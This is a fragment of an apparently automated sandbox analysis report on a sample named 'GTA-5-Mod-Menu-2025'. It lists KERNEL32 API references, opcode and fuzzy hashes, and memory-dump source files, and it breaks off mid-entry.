                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 682518063422259e66d24b705a1f9a8d977155a56566af9e99709f28dd45dabf
                                                                    • Instruction ID: f480687b8eecaea44ac7f4016663f439985fa210b6d0a42a61e1c3fc9f68d6b3
                                                                    • Opcode Fuzzy Hash: 682518063422259e66d24b705a1f9a8d977155a56566af9e99709f28dd45dabf
                                                                    • Instruction Fuzzy Hash: F971F3B1D0516C5FEF21AF68ED99AAAB7B8EF45310F5442D9E00893211DB358E84AF10
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F89A3F
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00F89B0B
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F89B24
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00F89B2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 785eddcaef46b5fc0c8c24b67b55e99e8571f7228d8008e12892e50d5dba098e
                                                                    • Instruction ID: 7e6580cbea56c330b3bf21ad066cd137d0fb22212a913af97cadc37d97eeed3a
                                                                    • Opcode Fuzzy Hash: 785eddcaef46b5fc0c8c24b67b55e99e8571f7228d8008e12892e50d5dba098e
                                                                    • Instruction Fuzzy Hash: E231F9B5D0521D9BDB61EF64DD497CDBBB8AF08300F1041AAE40CAB250E7B49A849F45
                                                                    APIs
                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F8A307
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F8A316
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00F8A31F
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00F8A32C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    • Opcode ID: bce81483294894bd674505fa5b2d691fc586897213848fb037e64a0f4125e892
                                                                    • Instruction ID: e5164c47ac02086f04e78d9b9f0eb803f741dcfaa0a18610c6bc353192bee9fa
                                                                    • Opcode Fuzzy Hash: bce81483294894bd674505fa5b2d691fc586897213848fb037e64a0f4125e892
                                                                    • Instruction Fuzzy Hash: 6BF0B2B0C0020CEBCB04DBB4CA4898EBBF4FF1D200B914995E412E7110E734AB44AB50
                                                                    APIs
                                                                      • Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
                                                                      • Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F9AD44
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F9AD8E
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F9AE54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 661929714-0
                                                                    • Opcode ID: e5c0d2a93380a6e1644bc703e79fe24fe7bec716374737b06244a79c2a12ff14
                                                                    • Instruction ID: ca16aacbb87bf9b6a086c7ea6167abbdea428a27d4572ce2a7f10cc94c64ea40
                                                                    • Opcode Fuzzy Hash: e5c0d2a93380a6e1644bc703e79fe24fe7bec716374737b06244a79c2a12ff14
                                                                    • Instruction Fuzzy Hash: 2361B4B19102079FFF28AF29CC82BBA77A8EF04314F104079ED05C6585E778D991EB95
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F91B18
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F91B22
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F91B2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: be2f22ccdd8266ecaf8efa5e952b18d4d9c76aaab7342eef03999dff88324bbf
                                                                    • Instruction ID: 76df738a4f147c754407c38fc5d53a1665103b50ccefc5d4448f2bf3ffe3ad95
                                                                    • Opcode Fuzzy Hash: be2f22ccdd8266ecaf8efa5e952b18d4d9c76aaab7342eef03999dff88324bbf
                                                                    • Instruction Fuzzy Hash: 0E31D37490121D9BCB21EF24DC887CDBBB8BF48310F5041EAE41CA6291EB749B859F44
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F9E9A9,?,?,00000008,?,?,00FA535B,00000000), ref: 00F9EC7B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 7abbfe0a2e7d73767977260db92c2c1160e9dc0a80ed43d3bdf1e8931e871110
                                                                    • Instruction ID: 9b06db4a7c231a8a3275298ac8d59b3391f6eab5a4b472a04396ff0ca65de148
                                                                    • Opcode Fuzzy Hash: 7abbfe0a2e7d73767977260db92c2c1160e9dc0a80ed43d3bdf1e8931e871110
                                                                    • Instruction Fuzzy Hash: ACB14E32610609DFEB19CF28C486B657BE0FF45364F298658E9DACF2A1C335E981DB40
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F896B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: 2752bdc29d0988659cac3955c330b374f202c50eb3db8f75a97740cb53e9519b
                                                                    • Instruction ID: b0b52ec7a73b4e2a30d7e8dd749dc125da34171d5db2876846f667041a0a22be
                                                                    • Opcode Fuzzy Hash: 2752bdc29d0988659cac3955c330b374f202c50eb3db8f75a97740cb53e9519b
                                                                    • Instruction Fuzzy Hash: EFA17BB1E152098BDB18CF54DCD26AEBBF0FB48324F28962ED415E7250D7B49A40EF90
                                                                    APIs
                                                                      • Part of subcall function 00F969B4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00F95B4F,00000001,00000364,00000002,000000FF,?,00000000,?,00F8D615,00000000,?), ref: 00F969F5
                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F9B849
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F9B93D
                                                                    • FindClose.KERNEL32(00000000), ref: 00F9B97C
                                                                    • FindClose.KERNEL32(00000000), ref: 00F9B9AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                    • String ID:
                                                                    • API String ID: 2701053895-0
                                                                    • Opcode ID: 1289ec920947374b0ddd780ffd36bca7710761142b7dcb5a2b05f640a2e30eda
                                                                    • Instruction ID: 366a6a34b16d3a536e2ffc9bb866dfa10b9f773a3fd56636e04150e07f33396e
                                                                    • Opcode Fuzzy Hash: 1289ec920947374b0ddd780ffd36bca7710761142b7dcb5a2b05f640a2e30eda
                                                                    • Instruction Fuzzy Hash: 63516876900108AFFF14AF78AD95ABEB7B9DF85324F1442ADF40897201EB349D41BB60
                                                                    APIs
                                                                      • Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
                                                                      • Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F9B004
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 3736152602-0
                                                                    • Opcode ID: ec75087425b40dc191a495c779d1169c9774d28b1d0ddd3b13de49215ca49894
                                                                    • Instruction ID: c48fd74857d90599632aa828b5d8ff5e148c94a2e54b7d1dc13966459f6243d4
                                                                    • Opcode Fuzzy Hash: ec75087425b40dc191a495c779d1169c9774d28b1d0ddd3b13de49215ca49894
                                                                    • Instruction Fuzzy Hash: AB21B672A00206ABFF28AB25ED41A7B77A8EF04310F104169F911D7151EB74DD44AB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: b7abda591af7959f65589960084a587e7ebfc65353aa94aca321f1fcddcceea6
                                                                    • Instruction ID: 42d8f520f4192eb056e8512168796a6a3756ce2eb7b8c340c95e486b2f326005
                                                                    • Opcode Fuzzy Hash: b7abda591af7959f65589960084a587e7ebfc65353aa94aca321f1fcddcceea6
                                                                    • Instruction Fuzzy Hash: F1B1F231E0060A8BCB28FE68C9956FEBBB1AF11324F140A1DE552DB6D1C775AD02FB51
                                                                    APIs
                                                                      • Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
                                                                      • Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F9B124
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 3736152602-0
                                                                    • Opcode ID: 734768102a3f9781879de76c6644e7aa7d7277ebad6fba2b045980f462dde31d
                                                                    • Instruction ID: 0cf5d1afc68d895424462182ba46973f5456a377d26d8601e79264e3533231b4
                                                                    • Opcode Fuzzy Hash: 734768102a3f9781879de76c6644e7aa7d7277ebad6fba2b045980f462dde31d
                                                                    • Instruction Fuzzy Hash: 0F112C32910106ABFF14AF28DD56ABA77ECEF05320B10417AF505D7240EB78ED44AB50
                                                                    APIs
                                                                      • Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
                                                                      • Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0
                                                                    • EnumSystemLocalesW.KERNEL32(00F9ACF0,00000001,00000000,?,-00000050,?,00F9AAD3,00000000,-00000002,00000000,?,00000055,?), ref: 00F9ACBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2417226690-0
                                                                    • Opcode ID: b557eb42550d7ab3c01ad46488d90a557064a8339212977929afc7a561697544
                                                                    • Instruction ID: 8dc0051a62ec4464c003654b4812bd2008d1886e212872ad7f07430770d8698f
                                                                    • Opcode Fuzzy Hash: b557eb42550d7ab3c01ad46488d90a557064a8339212977929afc7a561697544
                                                                    • Instruction Fuzzy Hash: 2B11E9366007055FEF189F39C89157AB791FF80768B15442CE9468B640D375F942E780
                                                                    APIs
                                                                      • Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
                                                                      • Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0
                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F9AF0C,00000000,00000000,?), ref: 00F9B2A9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 3736152602-0
                                                                    • Opcode ID: 0c957bdc18a8b4bd2f636d96e674870dfa72a4e5ce89d6282dbf4e63948f40f3
                                                                    • Instruction ID: a04a759511de777957ebe927933981c800988aa92a942e4d1aec432d5c1cb723
                                                                    • Opcode Fuzzy Hash: 0c957bdc18a8b4bd2f636d96e674870dfa72a4e5ce89d6282dbf4e63948f40f3
                                                                    • Instruction Fuzzy Hash: 61014933A10112BBFF2A5B219D0ABBE3758EB40328F14442DEC16E3180EB34FE01E694
                                                                    APIs
                                                                      • Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
                                                                      • Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0
                                                                    • EnumSystemLocalesW.KERNEL32(00F9AFB0,00000001,?,?,-00000050,?,00F9AA9B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00F9AF8D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2417226690-0
                                                                    • Opcode ID: a90294515a06c033e0ebda50010d9cf09eb0bd86ef362a1b6c2244b12a5b5c22
                                                                    • Instruction ID: ffb77283144ee330dc38747e7fb9cf2a3c0e2125fc8c87c009a70e20cf10da30
                                                                    • Opcode Fuzzy Hash: a90294515a06c033e0ebda50010d9cf09eb0bd86ef362a1b6c2244b12a5b5c22
                                                                    • Instruction Fuzzy Hash: 58F0F6762003045FEF25AF39DC81A7A7B91EF8176CB15896CFA468B690C6759C02E790
                                                                    APIs
                                                                      • Part of subcall function 00F91CD1: EnterCriticalSection.KERNEL32(?,?,00F95D98,?,00FAFC38,00000008,00F95C8A,00000000,00000000,?), ref: 00F91CE0
                                                                    • EnumSystemLocalesW.KERNEL32(00F968B0,00000001,00FAFCB8,0000000C,00F962B1,-00000050), ref: 00F968F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                    • String ID:
                                                                    • API String ID: 1272433827-0
                                                                    • Opcode ID: 936e1c66e598b19b563db1a5e7bbfb2b2ee375f36ea10552849a34e90115826e
                                                                    • Instruction ID: c569b61bdbd961e225adc70f80c060cdb0d27b60bdf43c6d4168241f7323d3ce
                                                                    • Opcode Fuzzy Hash: 936e1c66e598b19b563db1a5e7bbfb2b2ee375f36ea10552849a34e90115826e
                                                                    • Instruction Fuzzy Hash: 2AF03C76A00218DFEB00EFA9E842B9D77B0FB48721F10412AF411DB2D1CB799904EF85
                                                                    APIs
                                                                      • Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
                                                                      • Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0
                                                                    • EnumSystemLocalesW.KERNEL32(00F9B0D0,00000001,?,?,?,00F9AAF5,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00F9B0BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2417226690-0
                                                                    • Opcode ID: 655e4ab8902906345a9f6d54cf3d92e6a7c5726b0be5f2c82256592c1c5bce52
                                                                    • Instruction ID: c8006a71cb09df29dd8ff3ccb90ee651e59f0c5853eb3a55ad4935eb9c4d0283
